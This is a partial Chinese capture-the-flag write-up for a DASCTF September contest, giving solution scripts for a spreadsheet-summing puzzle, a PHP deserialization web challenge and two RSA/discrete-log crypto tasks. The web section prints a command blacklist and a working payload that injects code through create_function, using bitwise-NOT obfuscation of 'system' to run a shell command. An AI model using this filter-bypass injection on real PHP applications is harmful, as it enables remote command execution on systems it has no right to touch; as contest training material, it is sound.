DASCTF Sept X 浙江工业大学秋季挑战赛 部分wp_[dasctf sept x 浙江工业大学秋季挑战赛]girlfriend's account

排名28，还是太菜了，web就出了一道，eur1ka yyds

MISC

Girlfriend’s account

import re

import xlrd

data=xlrd.open_workbook("D:\webtest\information.xls")
table = data.sheets()[0]
nrows = table.nrows

price=table.col_values(0, start_rowx=1, end_rowx=5001)
number=table.col_values(1, start_rowx=1, end_rowx=5001)


def num_change(num):
    if num=='零':
        return 0;
    if num=='壹':
        return 1;
    if num=='贰':
        return 2;    
    if num=='叁':
        return 3;
    if num=='肆':
        return 4;
    if num=='陆':
        return 6;
    if num=='伍':
        return 5;
    if num=='柒':
        return 7;
    if num=='捌':
        return 8;
    if num=='玖':
        return 9;

def aoligeiganle(amount):
    chinese_num = {'零': 0, '壹': 1, '贰': 2, '叁': 3, '肆': 4, '伍': 5, '陆': 6, '柒': 7, '捌': 8, '玖': 9}
    chinese_amount = {'分': 0.01, '角': 0.1, '元': 1, '拾': 10, '佰': 100, '仟': 1000, '圆': 1}
    amount_float = 0
    if '亿' in amount:
        yi = re.match(r'(.+)亿.*', amount).group(1)
        amount_yi = 0
        for i in chinese_amount:
            if i in yi:
                amount_yi += chinese_num[yi[yi.index(i) - 1]] * chinese_amount[i]
        if yi[-1] in chinese_num.keys():
            amount_yi += chinese_num[yi[-1]]
        amount_float += amount_yi * 100000000
        amount = re.sub(r'.+亿', '', amount, count=1)
    if '万' in amount:
        wan = re.match(r'(.+)万.*', amount).group(1)
        amount_wan = 0
        for i in chinese_amount:
            if i in wan:
                amount_wan += chinese_num[wan[wan.index(i) - 1]] * chinese_amount[i]
        if wan[-1] in chinese_num.keys():
            amount_wan += chinese_num[wan[-1]]
        amount_float += amount_wan * 10000
        amount = re.sub(r'.+万', '', amount, count=1)

    amount_yuan = 0
    for i in chinese_amount:
        if i in amount:
            if amount[amount.index(i) - 1] in chinese_num.keys():
                amount_yuan += chinese_num[amount[amount.index(i) - 1]] * chinese_amount[i]
    amount_float += amount_yuan

    return amount_float

sum=0


for i in range(0,5000):
    sum+=aoligeiganle(price[i])*num_change(number[i])

print(sum)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75

没啥好说的，写了个脚本，跑就是了

web

hellounser

<?php
class A {
    public $var;
    public function show(){
        echo $this->var;
    }
    public function __invoke(){
        $this->show();
    }
}

class B{
    public $func;
    public $arg;
    
    public function show(){
        $func = $this->func;
        if(preg_match('/^[a-z0-9]*$/isD', $this->func) || preg_match('/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&|\$|\*|\||\<|\"|\'|\=|\?|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|\.|log/i', $this->arg)) { 
            die('No!No!No!'); 
        } else { 
            include "flag.php";
            //There is no code to print flag in flag.php
            $func('', $this->arg); 
        }
    }
    
    public function __toString(){
        $this->show();
        return "<br>"."Nice Job!!"."<br>";
    }
    
    
}

if(isset($_GET['pop'])){
    $aaa = unserialize($_GET['pop']);
    $aaa();
}
else{
    highlight_file(__FILE__);
}

?>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43

利用了一个函数create_function

有一些小trick

先上payload

<?php


class A {
    public $var;

    function __construct()
    {
        $this->var=new B(); 
    }
}

class B{
    public $func="\create_function";
    
    public $arg="};(~(".~'system'.")) (~(".~'cat Tru3flag.php'."));//";
    
    
    
}
$a=new A();
echo urlencode(serialize($a));

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

有点像bjd2020 ezphp 最后一步也是这样做的，首先有一个/isD匹配 s代表多行 所以加个\就能绕过，在arg处有一个过滤，用取反执行命令即可

cry

签到

import sympy
import binascii

m = 73964803637492582853353338913523546944627084372081477892312545091623069227301
c = 21572244511100216966799370397791432119463715616349800194229377843045443048821
n = 2 ** 256
flag=sympy.discrete_log(2**512,c,m)
print(binascii.unhexlify(hex(flag)[2:]))

1
2
3
4
5
6
7
8
9

RSA1

from hashlib import sha512
from Crypto.Util.number import long_to_bytes, getPrime, bytes_to_long
from libnum import invmod, gcd
import itertools
import time
import random
n=0xb41fb5d27aaacb43b64fed1bf6e11d0841ad4ad34e398f623479f734614f14075efce2f3f66361ed6cbea9e6b37fbf3d40764c5b1f802a37c5dc9ef7936a811e7fbcc282db778436315733926acc6cf29ae656814f412b6214de34c3decb2fb997df7de72589d059a6c8f6477e225b904a8a19ce220a5162182bff50b78517421f08ad9926e998060d481ef96c563ad3de95775885efa28772d58819d759cb8cf38da0dae0c93f0e54485fdc8468eff77f32653dd89bff7682a677be8d6c0327b372605202c657ccf82cf4d6678e017ffede8823d5804cba1e577ea5fa1d1b2cbe7ef5fefc691bd32757e98326abaf372d8f0fb83acd8528cbe79272a6c6a9ed6050e979680a6df31d7f91fee2d95944e1157f556661ec838c23ae257cfd844fc394e245fdbec934a976f82fb5e788f3cbfefa9b606599f40dfc02f49e60b0549f90d916abd89a9d8a06c95ad7f5429ecb1af5d1cb7eea5d9a1809fdd321f6148ef74094da19610af72687b0fb16ba7d81c1febd97d1aa1433e6f1a0e544208d136d358078dbd84099fcf9a1f439bf6e9d141317366f0904e24b561b66a1a54e309f0ea453691c0a16958245a726f68924cef0c44890f687899835df24d2e898164ceec8139ad6dd3b82e85d9b8081d5935618336c5a32785d6ecafa702aec3a2e605fa012b13e9f992203f597b272cd763fac797b0553755458a8dd765f488bL
e=0x1c4ff8928b4500a433443c1c9453a0cf97709941e0d8a9e6bcce3322199d0aaffd3af1f3611724f75911501113d2e45f8e28949750506a0e5da6a752f1b3904ef2c7b332a936e462804e1e218fe53a97fdbde339c2b825f00f07a8276c1c91b008e92bb81c343d66e80ca014ab625c6abf3968cc8a0f95e05f8dbafe23f217f7c356f6c382893817fc93f9dcc9fbaa625e0a606b6543518f52f40dad271c19ba95f7ceb8f371da5831915400cc3710a4b28eb7b154c4c238583f9dea6acfda554034134ced17f0f31c434753b4464202f1abec5ba6068a640602013bb13c4e90b190934d0bbdd68d8f827f93c90391b244ab0378cfdc4f0d70369bf5b511e74212dd8f7f167a3c914ac6206614daa009766ca381e614052c159459f6c73cb12448976ede30dcc6f4d2022259ac7d9566ba16bf1497ac7f26b40f484fc41f36b0b14a8d7a2fcd1a2311283e191ca5e1a5bba0ba99e13f38b46938f5cb2a31c19a3b9c0e77bd7e91120918fb2d8417fb6cd4e13c0ae8a2972e00ac668d1414a6d460223f6704e903156158d846278378c880c5316cb460efc791c07f0162ece663758cd66135e172af1f715e7f58b578dff23c3beb29c3e955982b2484625ac34e698987e7e81167b40e68118c3002aaff9a1d420a36edf8e34c197e7ecdcf4858620fe720a8dffca3928377abbbaf10532d3df8f81e36cce2efc76ea301edb4abL
enc_flag=0x39159c3347b30b993b02607d4e0add3d7550b0239191c562d12d674d535ab99458c021a6ed2baf0403400d76c7fc81017af027146e80489067f912590c1b44f6eb071bec820eae589d6efd8eab806d69ad11556141fd9b32e046fbc8ea1ca70942489c31d431301c5c04d2b9af84db0fce4ca9ac143b29bc22d4a6f694019dd8b54c24969641c465bee3d3ee8aaf8cf2144249690fb54d4a9c8631d90a2f3039d766fae259d0bc4eba19017e140d3042deb73a6361d00deb3324d53def9d208c9e76e16d8322b4f75713960a5975a8c7084deddd53d2d42153a6240efbda5a8751fe0cd3bbbc7267cafbc58b885370500a0a2fba32a539237b9a2b9973bea21e1daf9e1b72a742ef84998ac487b01816334c1b81549358a6963f7371e28a229043252fb2fbe4904f969ec32d9b0d8a93c855d3165c92813599114870275802043e1ec2c46f2b425c546c077d4314cb7cecfa156f31fb02302d8fa5323d33794302f9265ed34efe5601caa7c676f2624fd50f090d601f6b494e2697d46e1c63eeb1f9ca365965fc32d1a688dc7bd68ea98a555ceb3556668b44620cc432fe06a95f5a57ab07e963c312bc99b522b2e9ffaa03bee231696ea121fd0485a11c47d5dd78553847cc4bbe4b1cdcea69c1c802d194fa2cf34bc6ccaceb3bf8c229a9baa4f40f0adcae4fff6e012c062eabc95ceab679fd6c46f5540134cff383df7931L
fuzzing = "abcdefghijklmnopqrstuvwxyz0123456789QWERTYUIOPASDFGHJKLZXCVBNM"
fuzz = itertools.permutations(fuzzing, 5)

def cal_bit(num):
	num = int(num)
	l = len(bin(num))
	return l-2

def isqrt(n):
    x = n
    y = (x + 1) // 2
    while y < x:
        x = y
        y = (x + n // x) // 2
    if pow(x, 2) == n:
    	return x
    else:
    	return False

def divide_pq(ed, n):
	# ed = e*d
	k = ed - 1
	while True:
		g = random.randint(3, n-2)
		t = k
		while True:
			if t % 2 != 0:
				break
			t /= 2
			x = pow(g, t, n)
			if x > 1 and gcd(x-1, n) > 1:
				p = gcd(x-1, n)
				return (p, n/p)

def pi_b(x):
	bt = 536380958350616057242691418634880594502192106332317228051967064327642091297687630174183636288378234177476435270519631690543765125295554448698898712393467267006465045949611180821007306678935181142803069337672948471202242891010188677287454504933695082327796243976863378333980923047411230913909715527759877351702062345876337256220760223926254773346698839492268265110546383782370744599490250832085044856878026833181982756791595730336514399767134613980006467147592898197961789187070786602534602178082726728869941829230655559180178594489856595304902790182697751195581218334712892008282605180395912026326384913562290014629187579128041030500771670510157597682826798117937852656884106597180126028398398087318119586692935386069677459788971114075941533740462978961436933215446347246886948166247617422293043364968298176007659058279518552847235689217185712791081965260495815179909242072310545078116020998113413517429654328367707069941427368374644442366092232916196726067387582032505389946398237261580350780769275427857010543262176468343294217258086275244086292475394366278211528621216522312552812343261375050388129743012932727654986046774759567950981007877856194574274373776538888953502272879816420369255752871177234736347325263320696917012616273L
	return invmod(x, bt)

def con_fra(a, b):
	r = []
	while True:
		if a == 1:
			break
		tmp = a/b
		if tmp != 0:
			r.append(tmp)
		a, b = b, (a-tmp*b)
	return r

def wiener_attack(e, n):
	cf = con_fra(e, n)
	for x in xrange(len(cf)):
		k, d = 0, 1
		while x >= 0:
			k, d = d, d*cf[x] + k
			x -= 1
		# print "k: %s\nd: %s\n" %(k, d)
		phi_n = (e*d - 1)/k
		B = n - phi_n + 1
		C = n
		dt = pow(B, 2) - 4*C    # b^2 - 4*a*c
		if dt >= 0 and isqrt(dt) and (B+isqrt(dt)) % 2 == 0:
			print "phi_n: ", hex(phi_n)
			return phi_n
	print "wiener attack fail!"
    
t = pi_b(e)
print "get t = ", hex(t)
phi_n = wiener_attack(t, n)
u = invmod(t, phi_n)
print "get u = ", hex(u)
qq, pp = divide_pq(u*t, n)
print "get p = ", hex(pp)
print "get q = ", hex(qq)
d = invmod(e, (qq-1)*(pp-1))
print "get d = ", hex(d)
flag = pow(enc_flag, d, n)
print "get flag: ", long_to_bytes(flag)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87